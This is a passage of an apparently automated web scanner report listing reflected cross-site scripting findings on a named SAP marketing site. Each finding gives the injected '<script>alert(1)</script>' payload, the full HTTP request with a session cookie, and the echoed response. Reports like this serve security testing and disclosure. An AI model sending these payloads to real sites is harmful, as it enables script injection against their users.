The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab7fe"><script>alert(1)</script>a5d7dab7a6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoab7fe"><script>alert(1)</script>a5d7dab7a6f HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692589.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 795
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/favicon.icoab7fe"><script>alert(1)</script>a5d7dab7a6f">
...[SNIP]...
3.94. http://www.sapbusinessoptimizer.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18538<script>alert(1)</script>0816d580e57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico18538<script>alert(1)</script>0816d580e57 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692589.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 791
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>0816d580e57">http://www.sapbusinessoptimizer.com/favicon.ico18538<script>alert(1)</script>0816d580e57</a>
...[SNIP]...
3.95. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f27d4<script>alert(1)</script>9e1fbf305d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3Cf27d4<script>alert(1)</script>9e1fbf305d2/script%3Ea5d7dab7a6f HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692662.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:31:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 901
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>9e1fbf305d2/script%3Ea5d7dab7a6f">http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3Cf27d4<script>alert(1)</script>9e1fbf305d2/script%3Ea5d7dab7a6f</a>
...[SNIP]...
3.96. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c89"><script>alert(1)</script>713d58a2cd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3Ca7c89"><script>alert(1)</script>713d58a2cd2/script%3Ea5d7dab7a6f HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692662.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:31:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 905
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3Ca7c89"><script>alert(1)</script>713d58a2cd2/script%3Ea5d7dab7a6f">
...[SNIP]...
3.97. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69a3a"><script>alert(1)</script>699ec413f8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f69a3a"><script>alert(1)</script>699ec413f8c HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692662.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:31:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 905
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f69a3a"><script>alert(1)</script>699ec413f8c">
...[SNIP]...
3.98. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 86c22<script>alert(1)</script>99a0b1eb0e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f86c22<script>alert(1)</script>99a0b1eb0e3 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692662.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:31:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 901
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>99a0b1eb0e3">http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f86c22<script>alert(1)</script>99a0b1eb0e3</a>
...[SNIP]...
3.99. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /fonts/SAPSans2007ExtraBoldCond.woff

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8acc2<script>alert(1)</script>01c7804de87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fonts8acc2<script>alert(1)</script>01c7804de87/SAPSans2007ExtraBoldCond.woff HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 839
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>01c7804de87/SAPSans2007ExtraBoldCond.woff">http://www.sapbusinessoptimizer.com/fonts8acc2<script>alert(1)</script>01c7804de87/SAPSans2007ExtraBoldCond.woff</a>
...[SNIP]...
3.100. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /fonts/SAPSans2007ExtraBoldCond.woff

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a14ba"><script>alert(1)</script>01e6d48cacd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fontsa14ba"><script>alert(1)</script>01e6d48cacd/SAPSans2007ExtraBoldCond.woff HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 843
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/fontsa14ba"><script>alert(1)</script>01e6d48cacd/SAPSans2007ExtraBoldCond.woff">
...[SNIP]...
3.101. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /fonts/SAPSans2007ExtraBoldCond.woff

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26a30<script>alert(1)</script>99080e416fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fonts/SAPSans2007ExtraBoldCond.woff26a30<script>alert(1)</script>99080e416fe HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 839
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>99080e416fe">http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff26a30<script>alert(1)</script>99080e416fe</a>
...[SNIP]...
3.102. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /fonts/SAPSans2007ExtraBoldCond.woff

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c35b9"><script>alert(1)</script>cb0a464daf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fonts/SAPSans2007ExtraBoldCond.woffc35b9"><script>alert(1)</script>cb0a464daf0 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 843
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woffc35b9"><script>alert(1)</script>cb0a464daf0">
...[SNIP]...
3.103. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /js/swc/common.tao

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86654"><script>alert(1)</script>9a99eb8cf35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js86654"><script>alert(1)</script>9a99eb8cf35/swc/common.tao?v=2930 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 807
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/js86654"><script>alert(1)</script>9a99eb8cf35/swc/common.tao">
...[SNIP]...
3.104. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /js/swc/common.tao

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff9f9<script>alert(1)</script>98e1be46692 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsff9f9<script>alert(1)</script>98e1be46692/swc/common.tao?v=2930 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 803
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>98e1be46692/swc/common.tao">http://www.sapbusinessoptimizer.com/jsff9f9<script>alert(1)</script>98e1be46692/swc/common.tao</a>
...[SNIP]...
3.105. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /js/swc/common.tao

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ded0b"><script>alert(1)</script>a2327f34e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/swcded0b"><script>alert(1)</script>a2327f34e3/common.tao?v=2930 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 805
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/js/swcded0b"><script>alert(1)</script>a2327f34e3/common.tao">
...[SNIP]...
3.106. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /js/swc/common.tao

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c2db3<script>alert(1)</script>2ad3d8843b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/swcc2db3<script>alert(1)</script>2ad3d8843b1/common.tao?v=2930 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 803
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>2ad3d8843b1/common.tao">http://www.sapbusinessoptimizer.com/js/swcc2db3<script>alert(1)</script>2ad3d8843b1/common.tao</a>
...[SNIP]...
3.107. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /js/swc/common.tao

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload abbb8<script>alert(1)</script>28ecfb46467 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/swc/common.taoabbb8<script>alert(1)</script>28ecfb46467?v=2930 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 803
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>28ecfb46467">http://www.sapbusinessoptimizer.com/js/swc/common.taoabbb8<script>alert(1)</script>28ecfb46467</a>
...[SNIP]...
3.108. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /js/swc/common.tao

